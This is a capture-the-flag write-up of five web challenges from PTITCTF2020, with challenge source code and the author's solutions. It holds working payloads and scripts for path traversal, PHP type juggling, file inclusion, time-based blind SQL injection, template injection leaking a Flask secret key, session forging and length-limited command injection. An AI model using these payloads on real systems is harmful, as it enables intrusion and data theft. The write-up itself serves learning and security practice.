title | subtitle | summary | authors | tags | categories | ||||
[PTITCTF2020] Web Exploitation Writeups |
The contest takes place for 6 hours. I solved 2/5 challenges on time (Welcome and Login Login Login). This write-up had just finished after that. Thanks PTIT University for hosting this context. Thanks nhthongDfVn for great challenges and your enthusiasm!
Pieces of flag hidden on the website.
- robots.txt:
- js/free.js:
- index.html:
Flag: PTITCTF{h0c_v13n_h04n6_614_x1n_ch40}
Go to register.php?view_source
to get source.
if (isset($_GET['view_source'])) {
include_once 'config.php';
function get_absolute_path($path)
$unix = substr($path, 0, 1) === '/';
$path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path);
$parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen');
$absolutes = array();
foreach ($parts as $part) {
if ('.' == $part) continue;
if ('..' == $part) {
} else {
$absolutes[] = $part;
$final_path = implode(DIRECTORY_SEPARATOR, $absolutes);
if ($unix) {
$final_path = '/' . $final_path;
return $final_path;
if ($_GET['action'] == 'register' && isset($_POST['username']) && isset($_POST['password']) && isset($_POST['password']) && !empty($_POST['confirm-password']) && !empty(trim($_POST['username']))) {
$username = trim($_POST['username']);
$username = str_replace(array('../', '..\\'), '', $username); // ^_^
$password = $_POST['password'];
$user_dirs = glob(getcwd() . '/users/*');
foreach ($user_dirs as $user_dir) {
$user_dir_name = basename($user_dir);
if ($user_dir_name == $username) {
$error = 'The username already exists!';
if (!isset($error)) {
$user_dir = get_absolute_path(getcwd() . '/users/' . $username);
$base_dir = get_absolute_path(getcwd() . '/users');
if (strpos($user_dir, $base_dir) === false) { // \~(*o*)~/
$error = 'Invalid username!';
} else {
if (!isset($error)) {
if (!file_exists($user_dir) && !mkdir($user_dir, 0755, true)) {
$error = 'Cannot create directory!';
} else {
$password_file = $user_dir . '/' . PASSWORD_FILENAME;
if (file_put_contents($password_file, md5($password)) !== false) {
$_SESSION['username'] = $username;
header("Location: index.php");
} else {
$error = 'Cannot write file!';
} else if ($_GET['action'] == 'login' && isset($_POST['username']) && isset($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$user_dir = get_absolute_path(getcwd() . '/users/' . $username);
if (strpos($user_dir, getcwd()) == -1) {
$errror = 'Invalid username';
if (!isset($error)) {
$password_file = $user_dir . '/' . PASSWORD_FILENAME;
if (file_exists($password_file)) {
$password_md5 = file_get_contents($password_file);
if (md5($password) == $password_md5) {
if ($username == 'admin') {
$new_password = md5($password . SECRET);
file_put_contents($password_file, $new_password);
$_SESSION['username'] = $username;
header('Location: index.php');
} else {
$error = 'Invalid Credentials!';
} else {
$error = 'Invalid Credentials!';
} else {
if (isset($_GET['action']) && $_GET['action'] == 'logout') {
header('Location: auth.php');
Website will store authentication data in folder users/{username}/PASSWORD_FILENAME
The vulnerable code is here:
$username = str_replace(array('../', '..\\'), '', $username); // ^_^
We can put simple payload to attack path traversal, make your user authenticate locates at same file as admin. Sign up with info:
username = "....//users/admin"; // --> "../user/admin"
password = "whatever";
Login and get flag.
This is multiple tasks challenge.
The first task is a little tricky for me ...
You have to access the server with User Agent: Impostor
. But it's still not enough, looks like the server check string with:
if (!strpos($_SERVER['HTTP_USER_AGENT'],'Impostor'))
If Impostor
is start of User-Agent string, strpos
will return 0
, and you still will not pass.
The User-Agent must be in /.+/Imposter
User-Agent: foo Imposter
Then, we will come to the core part at 962d13fd2a584598d5f68c4408169e22.php
. Source code is also available here.
$secret="<fake fake>";
if (!isset($_SESSION['data'])) {
$data= $_SESSION['data'];
if (isset($_GET['I']) && !empty($_GET['I'])){
if ($_GET['I']==="Crewmates"){
if (isset($_GET['user_data']) && !empty($_GET['user_data'])){
if (!preg_match("/user_data/is",$_SERVER['QUERY_STRING'])){
if ($shavalue==$data){
header("Location: <next page>");
echo "Close";
else die ("Don't hack");
else {
header("Location: <current url>");
The first part, to use user_data
parameter, we have to bypass preg_match()
if (!preg_match("/user_data/is",$_SERVER['QUERY_STRING']));
It's can be done by URL encode.
The second part is checking hash value:
Summary the source code, we have:
$_SESSION['data'] = $shavalue.$secret;
$data= $_SESSION['data'];
// BUT
$data !== $shavalue.$secret;
What's wrong?
This part of code:
if (!isset($_SESSION['data'])) {
$data= $_SESSION['data'];
Will make the value of $data
always empty in the first request:
$data = "";
How about $shavalue?
In PHP, sha1(array()) === NULL
So, when $data === ""
and $shavalue === NULL
, we're going to pass this part. The payload:
curl -b "SESSIONID=" "http://server.com/962d13fd2a584598d5f68c4408169e22.php?I=Crewmates&user%5fdata[]="
It leads us to 21232f297a57a5a743894a0e4a801fc3.php
The clue in the login page:
StRcMp CoMpAnY very sercure
is vulnerable. So the final payload is:
curl -X POST -d "username=admin&pass[]=ab" http://localhost:8003/21232f297a57a5a743894a0e4a801fc3.php
Flag: PTITCTF{PasswordIsVeryStrongSoThatYouCanNotGuessOrBypass}
Endpoint policy.php?q=/etc/passwd
has Local File Inclusion. But the server not allow base64
string in query. So, we can not use ?q=php://filter/convert.base64-encode/resource=index.php
to read files content. Rot 13 php://filter/string.rot13/resource=index.php
is not work too, because it's not convert content not show up.
But, i found convert.iconv.*.
It's read data in utf-16el
encode, and output in utf-8
Convert it back.:
And thanks my teamate @catafact for this script:
data = "3f3c 6870 ... 3e6c 0a0d"
S = data.replace(' ', '')
for i in range(0, len(S), 4):
x = int(S[i+2:i+4], 16)
print(chr(x), end='')
x = int(S[i:i+2], 16)
print(chr(x), end='')
Now, we have source:
if ($db->connect_errno){
die('Could not connect');
function isExist($email){
global $db;
$query="select * from info where email='".$email."'";
if (@$result->num_rows > 0) return True; else return False;
function filter($name){
if (preg_match ("/drop|delete|update|insert|into|file_get_contents|load_file|outfile|column|ascii|ord|sleep|benchmark /is",$name))
return False;
return True;
if (isset($_POST['name'])||!empty($_POST['name'])||isset($_POST['email'])||!empty($_POST['email'])){
$name= $_POST['name'];
if (filter($name)===True&&filter($email)===True){
if (isExist($email)===False){
$query = $db->prepare("INSERT INTO info (name,email) VALUES (?, ?)");
$query->bind_param("ss", $name, $email);
echo "Success";
The isExist()
function is vulnerable to SQL Injection in email
parameter. But there are some filters:
function filter($name){
if (preg_match ("/drop|delete|update|insert|into|file_get_contents|load_file|outfile|column|ascii|ord|sleep|benchmark /is",$name))
return False;
return True;
When looking closer, we can see that the filter matches benchmark
(include space) not benchmark
pattern. The rest is to write the time-based script to extract the data.
QUERY = "' UNION SELECT null,null,(IF(BINARY SUBSTRING((SELECT table_name FROM information_schema.tables where TABLE_SCHEMA = database() and table_name != 'info'),{pos},1) = BINARY '{char}',BENCHMARK(5000000,ENCODE('MSG','by seconds')),null)) FROM info; -- -"
-> Table: get_point
Because column
is in black list, we have to extract data without column name. Follow hint to @tsu blog
The flag index is 2 in get_point
QUERY = "' UNION SELECT null,null,(IF(SUBSTRING((SELECT col_1 from (SELECT 1 as col_1 union select * from get_point limit 1 offset 2) x_table),{pos},1) = BINARY '{char}',BENCHMARK(5000000,ENCODE('MSG','by seconds')),null)) FROM info; -- -"
import string, requests
# Extract table name
QUERY = "' UNION SELECT null,null,(IF(BINARY SUBSTRING((SELECT table_name FROM information_schema.tables where TABLE_SCHEMA = database() and table_name != 'info'),{pos},1) = BINARY '{char}',BENCHMARK(5000000,ENCODE('MSG','by seconds')),null)) FROM info; -- -"
# Extract flag
QUERY = "' UNION SELECT null,null,(IF(SUBSTRING((SELECT col_1 from (SELECT 1 as col_1 union select * from get_point limit 1 offset 2) x_table),{pos},1) = BINARY '{char}',BENCHMARK(5000000,ENCODE('MSG','by seconds')),null)) FROM info; -- -"
URL = "http://localhost:8007/index.php"
data = {
"name": "whatever",
"email": QUERY
list_chars = string.printable.replace('%','')
output = ""
pos = 0
while True:
pos += 1
for char in list_chars:
data = {
"name": "whatever",
"email": QUERY.format(char=char, pos=str(pos))
request = requests.post(URL,data=data)
if (request.elapsed.total_seconds() > 0.5): # True
output += char
print("[*] Output: " + output + "...")
# PTITCTF{u_Kn0w_7ha7_15_5ql_71M3ba53d_1nJ3c710n}
Flag: # PTITCTF{u_Kn0w_7ha7_15_5ql_71M3ba53d_1nJ3c710n}
When buying CV n send to 1407
, we will get source code:
from flask import Flask, render_template,json,request,render_template_string,redirect,url_for
import subprocess
import shlex
import urllib.parse
import re
from flask import Flask, session
app= Flask(__name__)
app.config['SECRET_KEY'] = '<Some string like 1337>'
flag="<Some string like PTITCTF>"
with open("opt.txt", "r") as file:
opt_key = file.read().rstrip()
def validate_cookie():
username = session.get('username')
money = session.get('money')
if username and money:
return True
return False
@app.route('/news', methods =['POST','GET'])
def news():
if not validate_cookie():
return render_template('info.html')
return render_template('news.html')
@app.route('/us', methods =['POST','GET'])
def us():
return render_template('us.html')
@app.route('/', methods =['POST','GET'])
def index():
if request.method=='POST':
name=request.form.get('name') or None
print (name)
if name==None or len(name)<4 or len(name)>15:
return render_template('info.html',err="Tên phải từ 5-10 kí tự")
session['username'] = name
session['money'] = 2000
return redirect(url_for('news'))
return render_template('info.html')
@app.route('/store', methods =['POST','GET'])
def store():
if not validate_cookie():
return render_template('info.html')
if request.method=='POST':
category=request.form.get('category') or None
number= request.form.get('number') or None
if number:
if number.isdigit()==False:
return render_template('index.html', err="Chỉ nhập số")
return render_template('index.html', err="Không hợp lệ")
number= int(number)
if category:
if len(category)>15:
return render_template('index.html',err="Không hợp lệ")
if filter(category):
if execute(category, number):
if category=="cv":
return render_template('index.html',err="Thank you!! Here is your award:")
return render_template('index.html',err="Mua hàng thành công")
return render_template('index.html',err="Bạn không đủ tiền để mua")
return show_error(category)
return render_template('index.html')
return render_template('index.html')
@app.route('/flag', methods =['POST','GET'])
def show_flag():
if not validate_cookie():
return render_template('info.html')
if request.method=='POST':
otp= request.form.get('otp') or None
if otp and len(otp)>5:
if execute('flag',1) and otp==opt_key:
return render_template('flag.html', flag=flag)
return render_template('flag.html', flag="Giao dịch thất bại, ban mat 10000$")
return render_template('flag.html', flag="Mã OTP không hợp lệ")
return render_template('flag.html', flag='')
def check_command(s):
return any(i.isdigit() for i in s)
def filter(command):
if check_command(command):
return False
for item in blacklist:
if item in command:
return False
return True
def execute(category,number):
command="cat shop/"+category+".txt"
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
if line.isdigit():
total= num*number
if total<=your_money:
retval = p.wait()
return okay
def show_error(keyword):
string ='''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<p> Your word: {} is in our blacklist</p>
return render_template_string(string)
def not_found(error):
string ='''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Not Found</title>
<h1>Not Found</h1>
return render_template_string(string), 404
if __name__=="__main__":
app.run(host='', port=8010,debug=False)
In show_error(keyword)
function have Server Side Template Injection (SSIJ), check which payload:
Because the category
is limited to 15 characters, it is hard to RCE. But we can leak some important info by {{config}}
Character '
at the end of payload is to match filter()
function. It triggers SSTJ and show data up.
Now we have Flask SECRET_KEY='Sorry_but_i_can_not_give_you_flag'
. Re build app with this SECRET_KEY
and we can sign valid session with arbitrary data:
from flask import Flask, session, render_template_string
app= Flask(__name__)
app.config['SECRET_KEY'] = 'Sorry_but_i_can_not_give_you_flag'
@app.route('/', methods =['POST','GET'])
def index():
session['username'] = "CustomUser"
session['money'] = 100000000000000000000000000
return render_template_string("<h1>Hello</h1>")
if __name__=="__main__":
app.run(host='', port=8011,debug=True)
Go to
and get session: session=.eJyrVsrNz0utVLIyNMAJdJRKi1OL8hJzU5WslBKTEotTUpRqAaX6D10.X3tCxw.X9cG5T7JYjLtFFY_jVvdOY3MKdQ
The last task is leak opt_key
. I have a idea. The execute()
function is vulnerable to Path Traversal, so if input category=../opt&number=1
, amount we lose will be the content of opt.txt
file. Unfortunately, opt_key
seems like not just contain digits, so it can not pass line.isdigit()
After hours of trying, i gave up. I pm the author - nhthongDfVn for help. He sent me the picture:
Wow, I already knew it is vulnerable to Command Injection by $()
, but 15 characters limitation got me stuck. Boolean-based is familiar to SQL Injection, but it's mindset can reuse in this concept.
With payload at endpoint /store
category=$(grep ^a o*)*
If grep matches file content /^a/
of any file name /o*/ (seems like only opt.txt here), command will become:
cat shop/{file_content}*.txt
The output of it is error. (cat: ... No such file or directory
) and responses fail purchase - "Bạn không đủ tiền để mua"
Else if grep not matches, command will become:
cat shop/*.txt
You will get a successful purchase response and lose money equal to entire value of the items (no problem, we're rich!).
Now, we can detect boolean value. Time to write script.
import string, requests
CMD = "$(grep {opt} o*)*"
URL = "http://localhost:8010/store"
cookies = {'session': '.eJyrVsrNz0utVLIyNMAJdJRKi1OL8hJzU5WslBKTEotTUpRqAaX6D10.X3tCxw.X9cG5T7JYjLtFFY_jVvdOY3MKdQ'}
opt_key = "^" # Check from beginning
while True:
for char in string.ascii_letters[::]:
tem_opt_key = opt_key+char
data = {
"category": CMD.format(opt=tem_opt_key[-3:]),
"number": "1"
request = requests.post(URL,data=data,cookies=cookies)
if ("Bạn không đủ tiền để mua" in request.text): # True
opt_key += char
print("[+] Opt_key: " + opt_key[1:] + "...")
print('[*] Done! opt_key: ' + opt_key[1:])
Buy flag with otp vankientuyetmat
Flag: PTITCTF{Fl4Sk_IS_N07_s3CuR3}
- https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type Juggling
- https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/
- https://tsublogs.wordpress.com/2017/06/07/pentest-qa-cung-tsu-5-sql-injection-without-information_schema/